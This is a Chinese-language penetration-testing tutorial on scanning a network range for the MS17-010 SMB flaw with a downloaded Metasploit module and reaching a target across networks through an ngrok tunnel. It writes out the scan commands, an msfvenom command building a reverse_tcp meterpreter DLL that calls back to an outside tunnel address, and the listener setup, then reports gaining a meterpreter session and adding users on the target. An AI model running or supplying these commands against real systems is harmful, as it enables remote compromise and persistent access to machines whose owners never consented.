发布于2022年11月5日3年前 0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。首先是环境的搭建,具体如下表所示: 主机IP备注Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6,下载有方程式利用工具包(主要为Windows目录下的工具) Window2008 R2 64位 10.50.2.62 靶机,存在MS17-010漏洞,并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块,所以要去exploit-db下载,并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E4%B8%8B%E8%BD%BD%E8%84%9A%E6%9C%AC.png 启动Metasploit,模块会自动加载,或者使用命令reload_all重新加载所有模块。 2.漏洞扫描的使用方法 选择使用smb_ms_17_010模块,并查看使用命令。 msf > use auxiliary/scanner/smb/smb_ms_17_010 msf auxiliary(smb_ms_17_010) > show options http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E8%84%9A%E6%9C%AC%E8%AF%B4%E6%98%8E.png 所必须的参数有三个,对于无需登录的SMB,我们只需设置一下扫描的IP段、线程并运行即可开始扫描。 msf auxiliary(smb_ms_17_010) > set RHOSTS 10.50.2.1-255 RHOSTS => 10.50.2.1-255 msf auxiliary(smb_ms_17_010) > set THREADS 10 THREADS => 10 msf auxiliary(smb_ms_17_010) > run http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png 出现黄色警告的表示可能存在,需要进一步验证。为了方便将存在漏洞的IP列出来,写了一个简单的Python脚本。 import re if __name__ == '__main__': f = open("smb.txt", mode='r', buffering=1) while(True): line = f.readline() if line : if "likely" in line: print line.split(' ')[1].split(':')[0] else: break 提取出的IP如下所示: ..... 10.50.2.52 10.50.2.62 10.50.2.65 10.50.2.61 10.50.2.63 10.50.2.64 10.50.2.76 10.50.2.69 10.50.2.77 10.50.2.78 10.50.2.79 .... 0x02 内网穿透 有了存在漏洞的地址,接下来将开始对其进行验证,以10.50.2.62为例。由于Kali在虚拟机,宿主机IP为2.0..,目标机在10.50.2.*。相当于需要从内网到另一个内网, 选择采用了ngrok进行tcp的端口转发来实现内网的穿透。 这里采用了www.ngrok.cc平台进行演示,类似这样的平台有很多,例如natapp.cn等。注册并开通隧道,如图所示。 http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E4%B9%8B%E5%BC%80%E9%80%9A%E9%9A%A7%E9%81%93.png 下载对应的客户端,下载地址为:https://www.ngrok.cc/#down-client ,选择与系统对应的软件。我这里Kali为64位的,下载和使用命令如下: root@kali:~/Downloads# wget hls.ctopus.com/sunny/linux_amd64.zip root@kali:~/Downloads# unzip linux_amd64.zip root@kali:~/Downloads# cd linux_amd64/ root@kali:~/Downloads/linux_amd64# ls root@kali:~/Downloads/linux_amd64# ./sunny clientid 隧道ID 使用如下命令生成用于监听的dll文件。监听的IP为server.ngrok.cc的地址,端口为开通隧道时填写的远程端口。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E5%90%AF%E5%8A%A8ngrok.png出现下图的界面表示运行成功。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/ngrok%E5%90%AF%E5%8A%A8%E6%88%90%E5%8A%9F.png root@kali:~/Documents# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=6266 -f dll > got.dll http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E7%94%9F%E6%88%90%E7%9B%91%E5%90%ACdll%E6%96%87%E4%BB%B6.png 然后在Kali上设置监听本机的IP和端口,也就是在开通隧道时填写的本地端口。 use exploit/multi/handler set LHOST 192.168.232.134 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > exploit http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E7%9B%91%E5%90%AC.png 由于关于Eternalblue利用方法有很多教程了,这里就不详细说明了,如图所示。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E8%AE%BE%E7%BD%AE%E8%BF%87%E7%A8%8B.pnghttp://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E5%88%A9%E7%94%A8%E6%88%90%E5%8A%9F.png攻击成功时查看ngrok客户端发现有一个连接。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/ngrok%E8%BF%9E%E6%8E%A5%E6%88%90%E5%8A%9F.png而且Kali上也生成了一个meterpreter会话。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E8%BF%94%E5%9B%9Emeterpreter%E4%BC%9A%E8%AF%9D.png之后的操作就很简单了,可以添加用户等等。最后远程登录成功如下图所示。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/%E9%9D%B6%E6%9C%BA%E6%88%90%E5%8A%9F.png使用natapp也是可以的。http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/natapp%E8%BF%9E%E6%8E%A5%E6%88%90%E5%8A%9F.png 0x03 总结 本文主要以MS17-010为例,讲解了如何下载和利用Metasploit中没有的模块,以及如何解决内网到内网的穿透的问题,当然解决的方法还有很多,这里就不再介绍了。 没有什么新的知识,怕忘记所以记录一下~~ 0x04 参考 [1]https://www.exploit-db.com/exploits/41891/[2]http://bobao.360.cn/learning/detail/3041.html
创建帐户或登录后发表意见